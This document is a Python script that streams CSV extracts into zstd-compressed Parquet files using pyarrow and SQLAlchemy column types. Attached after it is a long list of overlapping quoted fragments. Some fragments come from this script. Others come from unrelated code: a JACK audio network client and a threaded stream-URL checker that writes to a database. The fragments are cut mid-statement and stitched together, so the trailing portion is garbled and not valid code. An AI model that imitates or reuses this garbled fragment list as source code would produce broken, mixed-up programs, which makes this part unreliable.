# but don't want to risk OOM issues on small build boxes.
BUFFER_SIZE_BYTES = 1000000000

# Maps a SQLAlchemy column type class to the Arrow type string used
# when building the pyarrow schema for that column.
sql_type_lookup: Dict[Type[TypeEngine], str] = {
    Integer: 'int32',
    SmallInteger: 'int16',
    Float: 'float64',
    String: 'str',
    CHAR: 'str',
    Text: 'str',
    Boolean: 'bool',
    # Some Parquet targets can't handle Parquet dates, so we need to
    # parse and pass timestamps
    Date: 'timestamp[ms]',
    DateTime: 'timestamp[ms]',
}
def get_fields(table: AlchemyTable) -> List[Tuple[str, str]]:
    """Return (column_name, arrow_type_string) pairs for *table*.

    Auto-increment columns are excluded: they are generated by the
    database and are not present in the extracted CSV files.
    """
    pairs: List[Tuple[str, str]] = []
    for column in table.columns.values():
        # Skip surrogate keys the database generates itself.
        if column.autoincrement is True:
            continue
        pairs.append((column.name, sql_type_lookup[type(column.type)]))
    return pairs
def write_files(metadata: AlchemyMetadata) -> None:
    """
    Creates a Parquet file for each table in the schema.

    For every table, streams the extracted ``.csv.zst`` file in batches
    and writes a zstd-compressed Parquet file under PARQUET_PREFIX,
    mirroring the ``<schema>/<table>`` layout of the extract directory.
    """
    tables: Iterator[AlchemyTable] = metadata.tables.values()
    for table in tables:
        name = table.name
        print(name)

        def get_path(prefix: Path, suffix: str) -> Path:
            # Files live under <prefix>/<schema>/<table><suffix>.
            parent_dir = prefix.joinpath(metadata.schema)
            parent_dir.mkdir(exist_ok=True, parents=True)
            return parent_dir.joinpath(name).with_suffix(suffix)

        extract_file = get_path(EXTRACT_PATH_PREFIX, ".csv.zst")
        parquet_file = get_path(PARQUET_PREFIX, ".parquet")

        # Compute the field list once (the original called get_fields twice).
        fields = get_fields(table)
        arrow_schema = pa.schema(fields)
        column_names = [field_name for field_name, _ in fields]

        # Use the module-level constant instead of repeating the literal
        # 1000000000, so the chunk size is tuned in one place.
        read_options = pcsv.ReadOptions(column_names=column_names,
                                        block_size=BUFFER_SIZE_BYTES)
        parse_options = pcsv.ParseOptions(newlines_in_values=True)
        convert_options = pcsv.ConvertOptions(
            column_types=arrow_schema,
            timestamp_parsers=["%Y%m%d", "%Y-%m-%d"],
            true_values=["1", "T"],
            false_values=["0", "F"],
            strings_can_be_null=True)

        parquet_writer = pq.ParquetWriter(parquet_file, schema=arrow_schema,
                                          compression='zstd', version="2.0",
                                          use_dictionary=True)
        try:
            stream_reader = pcsv.open_csv(extract_file,
                                          read_options=read_options,
                                          parse_options=parse_options,
                                          convert_options=convert_options)
            # Distinct name for the per-batch table: the original rebound
            # `table`, shadowing the outer loop variable.
            for batch in stream_reader:
                batch_table = pa.Table.from_batches([batch])
                parquet_writer.write_table(batch_table)
        finally:
            # Close the writer even if reading/conversion raises, so the
            # file handle is released and the footer is finalized.
            parquet_writer.close()


if __name__ == "__main__":
    for m in all_metadata:
        write_files(m)
# Larger sizes result in better compression and slightly faster time,", "Iterator, List, Tuple import pyarrow as pa from pyarrow import csv as pcsv", "\"\"\" tables: Iterator[AlchemyTable] = metadata.tables.values() for table in tables: name = table.name print(name)", "so we need to parse and pass timestamps Date: 'timestamp[ms]', DateTime: 'timestamp[ms]' }", "parquet as pq from sqlalchemy import MetaData as AlchemyMetadata, Table as AlchemyTable from", "arrow_schema = pa.schema(get_fields(table)) column_names = [name for name, dtype in get_fields(table)] read_options =", "Larger sizes result in better compression and slightly faster time, # but don't", "String: 'str', CHAR: 'str', Text: 'str', Boolean: 'bool', # Some Parquet targets can't", "metadata.tables.values() for table in tables: name = table.name print(name) def get_path(prefix: Path, suffix:", "= pcsv.ParseOptions(newlines_in_values=True) convert_options = pcsv.ConvertOptions(column_types=arrow_schema, timestamp_parsers=[\"%Y%m%d\", \"%Y-%m-%d\"], true_values=[\"1\", \"T\"], false_values=[\"0\", \"F\"], strings_can_be_null=True) parquet_writer", "pyarrow as pa from pyarrow import csv as pcsv from pyarrow import parquet", "schema. 
\"\"\" tables: Iterator[AlchemyTable] = metadata.tables.values() for table in tables: name = table.name", "TypeEngine from src.schemas import all_metadata from src import EXTRACT_PATH_PREFIX, TRANSFORM_PATH_PREFIX PARQUET_PREFIX = TRANSFORM_PATH_PREFIX.joinpath(\"parquet\")", "get_path(PARQUET_PREFIX, \".parquet\") arrow_schema = pa.schema(get_fields(table)) column_names = [name for name, dtype in get_fields(table)]", "Tuple import pyarrow as pa from pyarrow import csv as pcsv from pyarrow", "pq.ParquetWriter(parquet_file, schema=arrow_schema, compression='zstd', version=\"2.0\", use_dictionary=True) stream_reader = pcsv.open_csv(extract_file, read_options=read_options, parse_options=parse_options, convert_options=convert_options) for batch", "name = table.name print(name) def get_path(prefix: Path, suffix: str): parent_dir = prefix.joinpath(metadata.schema) parent_dir.mkdir(exist_ok=True,", "and pass timestamps Date: 'timestamp[ms]', DateTime: 'timestamp[ms]' } def get_fields(table: AlchemyTable) -> List[Tuple[str,", "in table.columns.values() if c.autoincrement is not True] return [(name, sql_type_lookup[type(dtype)]) for name, dtype", "Text, Boolean, Date, DateTime from sqlalchemy.sql.type_api import TypeEngine from src.schemas import all_metadata from", "c.type) for c in table.columns.values() if c.autoincrement is not True] return [(name, sql_type_lookup[type(dtype)])", "pcsv.ParseOptions(newlines_in_values=True) convert_options = pcsv.ConvertOptions(column_types=arrow_schema, timestamp_parsers=[\"%Y%m%d\", \"%Y-%m-%d\"], true_values=[\"1\", \"T\"], false_values=[\"0\", \"F\"], strings_can_be_null=True) parquet_writer =", "in get_fields(table)] read_options = pcsv.ReadOptions(column_names=column_names, block_size=1000000000) parse_options = pcsv.ParseOptions(newlines_in_values=True) convert_options = pcsv.ConvertOptions(column_types=arrow_schema, timestamp_parsers=[\"%Y%m%d\",", "AlchemyTable from sqlalchemy import Integer, SmallInteger, Float, String, CHAR, 
Text, Boolean, Date, DateTime", "in the schema. \"\"\" tables: Iterator[AlchemyTable] = metadata.tables.values() for table in tables: name", "\".csv.zst\") parquet_file = get_path(PARQUET_PREFIX, \".parquet\") arrow_schema = pa.schema(get_fields(table)) column_names = [name for name,", "all_metadata from src import EXTRACT_PATH_PREFIX, TRANSFORM_PATH_PREFIX PARQUET_PREFIX = TRANSFORM_PATH_PREFIX.joinpath(\"parquet\") CSV_PREFIX = TRANSFORM_PATH_PREFIX.joinpath(\"csv\") #", "table in tables: name = table.name print(name) def get_path(prefix: Path, suffix: str): parent_dir", "'float64', String: 'str', CHAR: 'str', Text: 'str', Boolean: 'bool', # Some Parquet targets", "'str', Text: 'str', Boolean: 'bool', # Some Parquet targets can't handle Parquet dates,", "pcsv.open_csv(extract_file, read_options=read_options, parse_options=parse_options, convert_options=convert_options) for batch in stream_reader: table = pa.Table.from_batches([batch]) parquet_writer.write_table(table) parquet_writer.close()", "sql_type_lookup: Dict[Type[TypeEngine], str] = { Integer: 'int32', SmallInteger: 'int16', Float: 'float64', String: 'str',", "from pyarrow import parquet as pq from sqlalchemy import MetaData as AlchemyMetadata, Table", "'int32', SmallInteger: 'int16', Float: 'float64', String: 'str', CHAR: 'str', Text: 'str', Boolean: 'bool',", "use_dictionary=True) stream_reader = pcsv.open_csv(extract_file, read_options=read_options, parse_options=parse_options, convert_options=convert_options) for batch in stream_reader: table =", "CSV_PREFIX = TRANSFORM_PATH_PREFIX.joinpath(\"csv\") # How many bytes in each CSV chunk to bring" ]
[ "#look at ports, find incoming netjack channel, #name of net port will have", "at ports, find incoming netjack channel, #name of net port will have some", "- hostname, time up, messages #passed through socket, etc. def runbash(self, cmd): process", "to system out #print something to cmd line - hostname, time up, messages", "-ef | grep jackd); if [[ $ijo == *\"/jackd\"* ]]; then echo \"RUNNING\";", "'jackd -R -d net' output, error = self.runbash(cmd) else: cmd = 'jackd -d", "# ---ESTABLISH SOCKET CONNECTION WITH SERVER--- # # ---ONCE ESTABLISHED, PROCEED--- # #slave", "---ESTABLISH SOCKET CONNECTION WITH SERVER--- # # ---ONCE ESTABLISHED, PROCEED--- # #slave -", "jclient = jack.Client('JackClient') #wait for server to verify netjack RUNNING #look at ports,", "output[0] == 'RUNNING': cmd = 'jackd -R -d net' output, error = self.runbash(cmd)", "net_in_p = jclient.get_ports('*TOKEN*') sys_out_p = jclient.get_ports('system:playback_*') # connect net_in_p to system out #print", "some identifying label - #figure it out ... here pretend it's TOKEN net_in_p", "CONNECTION WITH SERVER--- # # ---ONCE ESTABLISHED, PROCEED--- # #slave - open jackd", "echo \"RUNNING\"; fi' output, error = self.runbash(cmd0) if not output[0] == 'RUNNING': cmd", "if [[ $ijo == *\"/jackd\"* ]]; then echo \"RUNNING\"; fi' output, error =", "output, error if __name__ == \"__main__\": # nice opening message print('\\n') print('---------------------------------------') print('-----------C-O-D-E-C-A-S-T-------------')", "RUNNING #look at ports, find incoming netjack channel, #name of net port will", "for server to verify netjack RUNNING #look at ports, find incoming netjack channel,", "PROCEED--- # #slave - open jackd with net backend cmd0 = 'ijo=$(ps -ef", "output, error = self.runbash(cmd0) if not output[0] == 'RUNNING': cmd = 'jackd -R", "to cmd line - hostname, time up, messages #passed through socket, etc. def", "through socket, etc. 
def runbash(self, cmd): process = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE) output, error =", "#passed through socket, etc. def runbash(self, cmd): process = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE) output, error", "# #slave - open jackd with net backend cmd0 = 'ijo=$(ps -ef |", "grep jackd); if [[ $ijo == *\"/jackd\"* ]]; then echo \"RUNNING\"; fi' output,", "= 'jackd -d net' output, error = self.runbash(cmd) #ISSUE: maybe doesn't work without", "error = self.runbash(cmd0) if not output[0] == 'RUNNING': cmd = 'jackd -R -d", "- #figure it out ... here pretend it's TOKEN net_in_p = jclient.get_ports('*TOKEN*') sys_out_p", "$ijo == *\"/jackd\"* ]]; then echo \"RUNNING\"; fi' output, error = self.runbash(cmd0) if", "it's TOKEN net_in_p = jclient.get_ports('*TOKEN*') sys_out_p = jclient.get_ports('system:playback_*') # connect net_in_p to system", "cmd line - hostname, time up, messages #passed through socket, etc. def runbash(self,", "stdout=subprocess.PIPE) output, error = process.communicate() return output, error if __name__ == \"__main__\": #", "channel, #name of net port will have some identifying label - #figure it", "# ---ONCE ESTABLISHED, PROCEED--- # #slave - open jackd with net backend cmd0", "port will have some identifying label - #figure it out ... here pretend", "= self.runbash(cmd) #ISSUE: maybe doesn't work without -R realtime flag? 
#start jack client", "# nice opening message print('\\n') print('---------------------------------------') print('-----------C-O-D-E-C-A-S-T-------------') print('-----------------v1.0------------------') print('---------------------------------------') print('-------(c) <NAME> 2018----------') print('---------------------------------------')", "verify netjack RUNNING #look at ports, find incoming netjack channel, #name of net", "Client(): def __init__(self): #@todo: # ---ESTABLISH SOCKET CONNECTION WITH SERVER--- # # ---ONCE", "cmd = 'jackd -R -d net' output, error = self.runbash(cmd) else: cmd =", "#start jack client to manage connections jclient = jack.Client('JackClient') #wait for server to", "ports, find incoming netjack channel, #name of net port will have some identifying", "jack.Client('JackClient') #wait for server to verify netjack RUNNING #look at ports, find incoming", "ESTABLISHED, PROCEED--- # #slave - open jackd with net backend cmd0 = 'ijo=$(ps", "from socket import * from threading import Thread import jack class Client(): def", "= jclient.get_ports('*TOKEN*') sys_out_p = jclient.get_ports('system:playback_*') # connect net_in_p to system out #print something", "-d net' output, error = self.runbash(cmd) #ISSUE: maybe doesn't work without -R realtime", "error if __name__ == \"__main__\": # nice opening message print('\\n') print('---------------------------------------') print('-----------C-O-D-E-C-A-S-T-------------') print('-----------------v1.0------------------')", "* from threading import Thread import jack class Client(): def __init__(self): #@todo: #", "incoming netjack channel, #name of net port will have some identifying label -", "pretend it's TOKEN net_in_p = jclient.get_ports('*TOKEN*') sys_out_p = jclient.get_ports('system:playback_*') # connect net_in_p to", "#print something to cmd line - hostname, time up, messages #passed through socket,", "os, subprocess from socket import * from threading import Thread import jack class", "socket 
import * from threading import Thread import jack class Client(): def __init__(self):", "'ijo=$(ps -ef | grep jackd); if [[ $ijo == *\"/jackd\"* ]]; then echo", "\"__main__\": # nice opening message print('\\n') print('---------------------------------------') print('-----------C-O-D-E-C-A-S-T-------------') print('-----------------v1.0------------------') print('---------------------------------------') print('-------(c) <NAME> 2018----------')", "of net port will have some identifying label - #figure it out ...", "socket, etc. def runbash(self, cmd): process = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE) output, error = process.communicate()", "-R -d net' output, error = self.runbash(cmd) else: cmd = 'jackd -d net'", "= jclient.get_ports('system:playback_*') # connect net_in_p to system out #print something to cmd line", "-R realtime flag? #start jack client to manage connections jclient = jack.Client('JackClient') #wait", "from threading import Thread import jack class Client(): def __init__(self): #@todo: # ---ESTABLISH", "process = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE) output, error = process.communicate() return output, error if __name__", "cmd): process = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE) output, error = process.communicate() return output, error if", "without -R realtime flag? 
#start jack client to manage connections jclient = jack.Client('JackClient')", "to manage connections jclient = jack.Client('JackClient') #wait for server to verify netjack RUNNING", "subprocess from socket import * from threading import Thread import jack class Client():", "if __name__ == \"__main__\": # nice opening message print('\\n') print('---------------------------------------') print('-----------C-O-D-E-C-A-S-T-------------') print('-----------------v1.0------------------') print('---------------------------------------')", "netjack RUNNING #look at ports, find incoming netjack channel, #name of net port", "will have some identifying label - #figure it out ... here pretend it's", "\"RUNNING\"; fi' output, error = self.runbash(cmd0) if not output[0] == 'RUNNING': cmd =", "work without -R realtime flag? #start jack client to manage connections jclient =", "jack class Client(): def __init__(self): #@todo: # ---ESTABLISH SOCKET CONNECTION WITH SERVER--- #", "# connect net_in_p to system out #print something to cmd line - hostname,", "#wait for server to verify netjack RUNNING #look at ports, find incoming netjack", "connections jclient = jack.Client('JackClient') #wait for server to verify netjack RUNNING #look at", "flag? 
#start jack client to manage connections jclient = jack.Client('JackClient') #wait for server", "here pretend it's TOKEN net_in_p = jclient.get_ports('*TOKEN*') sys_out_p = jclient.get_ports('system:playback_*') # connect net_in_p", "SOCKET CONNECTION WITH SERVER--- # # ---ONCE ESTABLISHED, PROCEED--- # #slave - open", "#name of net port will have some identifying label - #figure it out", "import Thread import jack class Client(): def __init__(self): #@todo: # ---ESTABLISH SOCKET CONNECTION", "process.communicate() return output, error if __name__ == \"__main__\": # nice opening message print('\\n')", "subprocess.Popen(cmd.split(), stdout=subprocess.PIPE) output, error = process.communicate() return output, error if __name__ == \"__main__\":", "nice opening message print('\\n') print('---------------------------------------') print('-----------C-O-D-E-C-A-S-T-------------') print('-----------------v1.0------------------') print('---------------------------------------') print('-------(c) <NAME> 2018----------') print('---------------------------------------') print('------------~client", "'RUNNING': cmd = 'jackd -R -d net' output, error = self.runbash(cmd) else: cmd", "- open jackd with net backend cmd0 = 'ijo=$(ps -ef | grep jackd);", "self.runbash(cmd0) if not output[0] == 'RUNNING': cmd = 'jackd -R -d net' output,", "hostname, time up, messages #passed through socket, etc. 
def runbash(self, cmd): process =", "#slave - open jackd with net backend cmd0 = 'ijo=$(ps -ef | grep", "= 'jackd -R -d net' output, error = self.runbash(cmd) else: cmd = 'jackd", "open jackd with net backend cmd0 = 'ijo=$(ps -ef | grep jackd); if", "import jack class Client(): def __init__(self): #@todo: # ---ESTABLISH SOCKET CONNECTION WITH SERVER---", "-d net' output, error = self.runbash(cmd) else: cmd = 'jackd -d net' output,", "cmd0 = 'ijo=$(ps -ef | grep jackd); if [[ $ijo == *\"/jackd\"* ]];", "[[ $ijo == *\"/jackd\"* ]]; then echo \"RUNNING\"; fi' output, error = self.runbash(cmd0)", "time up, messages #passed through socket, etc. def runbash(self, cmd): process = subprocess.Popen(cmd.split(),", "]]; then echo \"RUNNING\"; fi' output, error = self.runbash(cmd0) if not output[0] ==", "client to manage connections jclient = jack.Client('JackClient') #wait for server to verify netjack", "error = process.communicate() return output, error if __name__ == \"__main__\": # nice opening", "== 'RUNNING': cmd = 'jackd -R -d net' output, error = self.runbash(cmd) else:", "= self.runbash(cmd) else: cmd = 'jackd -d net' output, error = self.runbash(cmd) #ISSUE:", "__name__ == \"__main__\": # nice opening message print('\\n') print('---------------------------------------') print('-----------C-O-D-E-C-A-S-T-------------') print('-----------------v1.0------------------') print('---------------------------------------') print('-------(c)", "out ... here pretend it's TOKEN net_in_p = jclient.get_ports('*TOKEN*') sys_out_p = jclient.get_ports('system:playback_*') #", "runbash(self, cmd): process = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE) output, error = process.communicate() return output, error", "not output[0] == 'RUNNING': cmd = 'jackd -R -d net' output, error =", "self.runbash(cmd) #ISSUE: maybe doesn't work without -R realtime flag? 
#start jack client to", "= subprocess.Popen(cmd.split(), stdout=subprocess.PIPE) output, error = process.communicate() return output, error if __name__ ==", "= jack.Client('JackClient') #wait for server to verify netjack RUNNING #look at ports, find", "error = self.runbash(cmd) else: cmd = 'jackd -d net' output, error = self.runbash(cmd)", "#ISSUE: maybe doesn't work without -R realtime flag? #start jack client to manage", "something to cmd line - hostname, time up, messages #passed through socket, etc.", "messages #passed through socket, etc. def runbash(self, cmd): process = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE) output,", "net' output, error = self.runbash(cmd) #ISSUE: maybe doesn't work without -R realtime flag?", "TOKEN net_in_p = jclient.get_ports('*TOKEN*') sys_out_p = jclient.get_ports('system:playback_*') # connect net_in_p to system out", "jclient.get_ports('system:playback_*') # connect net_in_p to system out #print something to cmd line -", "SERVER--- # # ---ONCE ESTABLISHED, PROCEED--- # #slave - open jackd with net", "= self.runbash(cmd0) if not output[0] == 'RUNNING': cmd = 'jackd -R -d net'", "manage connections jclient = jack.Client('JackClient') #wait for server to verify netjack RUNNING #look", "| grep jackd); if [[ $ijo == *\"/jackd\"* ]]; then echo \"RUNNING\"; fi'", "line - hostname, time up, messages #passed through socket, etc. def runbash(self, cmd):", "jackd); if [[ $ijo == *\"/jackd\"* ]]; then echo \"RUNNING\"; fi' output, error", "label - #figure it out ... 
here pretend it's TOKEN net_in_p = jclient.get_ports('*TOKEN*')", "out #print something to cmd line - hostname, time up, messages #passed through", "__init__(self): #@todo: # ---ESTABLISH SOCKET CONNECTION WITH SERVER--- # # ---ONCE ESTABLISHED, PROCEED---", "message print('\\n') print('---------------------------------------') print('-----------C-O-D-E-C-A-S-T-------------') print('-----------------v1.0------------------') print('---------------------------------------') print('-------(c) <NAME> 2018----------') print('---------------------------------------') print('------------~client edition~-----------') print('\\n')", "connect net_in_p to system out #print something to cmd line - hostname, time", "= 'ijo=$(ps -ef | grep jackd); if [[ $ijo == *\"/jackd\"* ]]; then", "backend cmd0 = 'ijo=$(ps -ef | grep jackd); if [[ $ijo == *\"/jackd\"*", "<reponame>pitchaim/codecast<gh_stars>0 import os, subprocess from socket import * from threading import Thread import", "system out #print something to cmd line - hostname, time up, messages #passed", "== *\"/jackd\"* ]]; then echo \"RUNNING\"; fi' output, error = self.runbash(cmd0) if not", "WITH SERVER--- # # ---ONCE ESTABLISHED, PROCEED--- # #slave - open jackd with", "then echo \"RUNNING\"; fi' output, error = self.runbash(cmd0) if not output[0] == 'RUNNING':", "net' output, error = self.runbash(cmd) else: cmd = 'jackd -d net' output, error", "with net backend cmd0 = 'ijo=$(ps -ef | grep jackd); if [[ $ijo", "if not output[0] == 'RUNNING': cmd = 'jackd -R -d net' output, error", "class Client(): def __init__(self): #@todo: # ---ESTABLISH SOCKET CONNECTION WITH SERVER--- # #", "jclient.get_ports('*TOKEN*') sys_out_p = jclient.get_ports('system:playback_*') # connect net_in_p to system out #print something to", "output, error = process.communicate() return output, error if __name__ == \"__main__\": # nice", "jackd with net backend cmd0 = 'ijo=$(ps -ef | grep jackd); if [[", "*\"/jackd\"* ]]; then echo \"RUNNING\"; fi' 
output, error = self.runbash(cmd0) if not output[0]", "fi' output, error = self.runbash(cmd0) if not output[0] == 'RUNNING': cmd = 'jackd", "up, messages #passed through socket, etc. def runbash(self, cmd): process = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE)", "== \"__main__\": # nice opening message print('\\n') print('---------------------------------------') print('-----------C-O-D-E-C-A-S-T-------------') print('-----------------v1.0------------------') print('---------------------------------------') print('-------(c) <NAME>", "jack client to manage connections jclient = jack.Client('JackClient') #wait for server to verify", "find incoming netjack channel, #name of net port will have some identifying label", "identifying label - #figure it out ... here pretend it's TOKEN net_in_p =", "error = self.runbash(cmd) #ISSUE: maybe doesn't work without -R realtime flag? #start jack", "... here pretend it's TOKEN net_in_p = jclient.get_ports('*TOKEN*') sys_out_p = jclient.get_ports('system:playback_*') # connect", "doesn't work without -R realtime flag? #start jack client to manage connections jclient", "to verify netjack RUNNING #look at ports, find incoming netjack channel, #name of", "maybe doesn't work without -R realtime flag? #start jack client to manage connections", "import * from threading import Thread import jack class Client(): def __init__(self): #@todo:", "Thread import jack class Client(): def __init__(self): #@todo: # ---ESTABLISH SOCKET CONNECTION WITH", "cmd = 'jackd -d net' output, error = self.runbash(cmd) #ISSUE: maybe doesn't work", "= process.communicate() return output, error if __name__ == \"__main__\": # nice opening message", "threading import Thread import jack class Client(): def __init__(self): #@todo: # ---ESTABLISH SOCKET", "output, error = self.runbash(cmd) else: cmd = 'jackd -d net' output, error =", "have some identifying label - #figure it out ... 
here pretend it's TOKEN", "self.runbash(cmd) else: cmd = 'jackd -d net' output, error = self.runbash(cmd) #ISSUE: maybe", "return output, error if __name__ == \"__main__\": # nice opening message print('\\n') print('---------------------------------------')", "realtime flag? #start jack client to manage connections jclient = jack.Client('JackClient') #wait for", "opening message print('\\n') print('---------------------------------------') print('-----------C-O-D-E-C-A-S-T-------------') print('-----------------v1.0------------------') print('---------------------------------------') print('-------(c) <NAME> 2018----------') print('---------------------------------------') print('------------~client edition~-----------')", "net backend cmd0 = 'ijo=$(ps -ef | grep jackd); if [[ $ijo ==", "else: cmd = 'jackd -d net' output, error = self.runbash(cmd) #ISSUE: maybe doesn't", "#@todo: # ---ESTABLISH SOCKET CONNECTION WITH SERVER--- # # ---ONCE ESTABLISHED, PROCEED--- #", "# # ---ONCE ESTABLISHED, PROCEED--- # #slave - open jackd with net backend", "netjack channel, #name of net port will have some identifying label - #figure", "etc. def runbash(self, cmd): process = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE) output, error = process.communicate() return", "server to verify netjack RUNNING #look at ports, find incoming netjack channel, #name", "it out ... here pretend it's TOKEN net_in_p = jclient.get_ports('*TOKEN*') sys_out_p = jclient.get_ports('system:playback_*')", "#figure it out ... here pretend it's TOKEN net_in_p = jclient.get_ports('*TOKEN*') sys_out_p =", "net_in_p to system out #print something to cmd line - hostname, time up,", "output, error = self.runbash(cmd) #ISSUE: maybe doesn't work without -R realtime flag? 
#start", "sys_out_p = jclient.get_ports('system:playback_*') # connect net_in_p to system out #print something to cmd", "import os, subprocess from socket import * from threading import Thread import jack", "---ONCE ESTABLISHED, PROCEED--- # #slave - open jackd with net backend cmd0 =", "def runbash(self, cmd): process = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE) output, error = process.communicate() return output,", "'jackd -d net' output, error = self.runbash(cmd) #ISSUE: maybe doesn't work without -R", "def __init__(self): #@todo: # ---ESTABLISH SOCKET CONNECTION WITH SERVER--- # # ---ONCE ESTABLISHED,", "net port will have some identifying label - #figure it out ... here" ]
[ "int(time.time() * 1000) def getItems(self): pass def onCompleted(self): pass def getSource(self): sourceItems =", "0: self.T.logger('正在分析[ %s ]: %s' % (item['name'], item['url'])) netstat = self.T.chkPlayable(item['url']) item['online'] =", "threads.wait_completion() self.onCompleted() def checkData(self, item): if 'url' in item and len(item['url']) > 0:", "0 item['delay'] = netstat item['udTime'] = self.now if netstat == 0: item['failcount'] +=", "ThreadPool class DetectorBase(object): \"\"\"the base class for detecting\"\"\" def __init__(self): self.T = tools.Tools()", "= netstat item['udTime'] = self.now if netstat == 0: item['failcount'] += 1 self.addData(item)", "sql = \"SELECT * FROM %s WHERE url = '%s'\" % (DB.table, data['url'])", "coding: utf-8 -*- import tools import time import db import threading from .threads", "-*- coding: utf-8 -*- import tools import time import db import threading from", "class DetectorBase(object): \"\"\"the base class for detecting\"\"\" def __init__(self): self.T = tools.Tools() self.now", "(item['name'], item['url'])) netstat = self.T.chkPlayable(item['url']) item['online'] = 1 if netstat > 0 else", "% (DB.table, data['url']) result = DB.query(sql) if len(result) == 0 : DB.insert(data) else", "= self.now if netstat == 0: item['failcount'] += 1 self.addData(item) def addData (self,", "for detecting\"\"\" def __init__(self): self.T = tools.Tools() self.now = int(time.time() * 1000) def", "def onCompleted(self): pass def getSource(self): sourceItems = self.getItems() threads = ThreadPool(20) for info", "for info in sourceItems: threads.add_task(self.checkData, item = info) threads.wait_completion() self.onCompleted() def checkData(self, item):", "\"SELECT * FROM %s WHERE url = '%s'\" % (DB.table, data['url']) result =", "%s ]: %s' % (item['name'], item['url'])) netstat = self.T.chkPlayable(item['url']) item['online'] = 1 if", "ThreadPool(20) for info in sourceItems: threads.add_task(self.checkData, item = info) 
threads.wait_completion() self.onCompleted() def checkData(self,", "if 'url' in item and len(item['url']) > 0: self.T.logger('正在分析[ %s ]: %s' %", "= self.T.chkPlayable(item['url']) item['online'] = 1 if netstat > 0 else 0 item['delay'] =", ".threads import ThreadPool class DetectorBase(object): \"\"\"the base class for detecting\"\"\" def __init__(self): self.T", "def getSource(self): sourceItems = self.getItems() threads = ThreadPool(20) for info in sourceItems: threads.add_task(self.checkData,", "= self.getItems() threads = ThreadPool(20) for info in sourceItems: threads.add_task(self.checkData, item = info)", "item = info) threads.wait_completion() self.onCompleted() def checkData(self, item): if 'url' in item and", "DB.insert(data) else : id = result[0][0] if data['failcount'] >= 10: DB.delete(id) else: DB.edit(id,", "and len(item['url']) > 0: self.T.logger('正在分析[ %s ]: %s' % (item['name'], item['url'])) netstat =", "def checkData(self, item): if 'url' in item and len(item['url']) > 0: self.T.logger('正在分析[ %s", "def getItems(self): pass def onCompleted(self): pass def getSource(self): sourceItems = self.getItems() threads =", "]: %s' % (item['name'], item['url'])) netstat = self.T.chkPlayable(item['url']) item['online'] = 1 if netstat", "0: item['failcount'] += 1 self.addData(item) def addData (self, data) : DB = db.DataBase()", "item): if 'url' in item and len(item['url']) > 0: self.T.logger('正在分析[ %s ]: %s'", "> 0 else 0 item['delay'] = netstat item['udTime'] = self.now if netstat ==", "result = DB.query(sql) if len(result) == 0 : DB.insert(data) else : id =", "base class for detecting\"\"\" def __init__(self): self.T = tools.Tools() self.now = int(time.time() *", "item['failcount'] += 1 self.addData(item) def addData (self, data) : DB = db.DataBase() sql", "import ThreadPool class DetectorBase(object): \"\"\"the base class for detecting\"\"\" def __init__(self): self.T =", "= info) threads.wait_completion() self.onCompleted() def checkData(self, item): if 
'url' in item and len(item['url'])", "db.DataBase() sql = \"SELECT * FROM %s WHERE url = '%s'\" % (DB.table,", "* 1000) def getItems(self): pass def onCompleted(self): pass def getSource(self): sourceItems = self.getItems()", "= DB.query(sql) if len(result) == 0 : DB.insert(data) else : id = result[0][0]", "DetectorBase(object): \"\"\"the base class for detecting\"\"\" def __init__(self): self.T = tools.Tools() self.now =", "import threading from .threads import ThreadPool class DetectorBase(object): \"\"\"the base class for detecting\"\"\"", "pass def onCompleted(self): pass def getSource(self): sourceItems = self.getItems() threads = ThreadPool(20) for", "def addData (self, data) : DB = db.DataBase() sql = \"SELECT * FROM", "info in sourceItems: threads.add_task(self.checkData, item = info) threads.wait_completion() self.onCompleted() def checkData(self, item): if", "sourceItems: threads.add_task(self.checkData, item = info) threads.wait_completion() self.onCompleted() def checkData(self, item): if 'url' in", "else 0 item['delay'] = netstat item['udTime'] = self.now if netstat == 0: item['failcount']", "sourceItems = self.getItems() threads = ThreadPool(20) for info in sourceItems: threads.add_task(self.checkData, item =", "= db.DataBase() sql = \"SELECT * FROM %s WHERE url = '%s'\" %", "1 if netstat > 0 else 0 item['delay'] = netstat item['udTime'] = self.now", "self.getItems() threads = ThreadPool(20) for info in sourceItems: threads.add_task(self.checkData, item = info) threads.wait_completion()", "* FROM %s WHERE url = '%s'\" % (DB.table, data['url']) result = DB.query(sql)", "self.onCompleted() def checkData(self, item): if 'url' in item and len(item['url']) > 0: self.T.logger('正在分析[", "threading from .threads import ThreadPool class DetectorBase(object): \"\"\"the base class for detecting\"\"\" def", "> 0: self.T.logger('正在分析[ %s ]: %s' % (item['name'], item['url'])) netstat = self.T.chkPlayable(item['url']) item['online']", "threads = ThreadPool(20) for 
info in sourceItems: threads.add_task(self.checkData, item = info) threads.wait_completion() self.onCompleted()", "threads.add_task(self.checkData, item = info) threads.wait_completion() self.onCompleted() def checkData(self, item): if 'url' in item", "= '%s'\" % (DB.table, data['url']) result = DB.query(sql) if len(result) == 0 :", "self.now = int(time.time() * 1000) def getItems(self): pass def onCompleted(self): pass def getSource(self):", "checkData(self, item): if 'url' in item and len(item['url']) > 0: self.T.logger('正在分析[ %s ]:", "import time import db import threading from .threads import ThreadPool class DetectorBase(object): \"\"\"the", "= int(time.time() * 1000) def getItems(self): pass def onCompleted(self): pass def getSource(self): sourceItems", "= \"SELECT * FROM %s WHERE url = '%s'\" % (DB.table, data['url']) result", "FROM %s WHERE url = '%s'\" % (DB.table, data['url']) result = DB.query(sql) if", "(DB.table, data['url']) result = DB.query(sql) if len(result) == 0 : DB.insert(data) else :", "%s WHERE url = '%s'\" % (DB.table, data['url']) result = DB.query(sql) if len(result)", "getSource(self): sourceItems = self.getItems() threads = ThreadPool(20) for info in sourceItems: threads.add_task(self.checkData, item", "+= 1 self.addData(item) def addData (self, data) : DB = db.DataBase() sql =", "item['udTime'] = self.now if netstat == 0: item['failcount'] += 1 self.addData(item) def addData", "self.T = tools.Tools() self.now = int(time.time() * 1000) def getItems(self): pass def onCompleted(self):", "in sourceItems: threads.add_task(self.checkData, item = info) 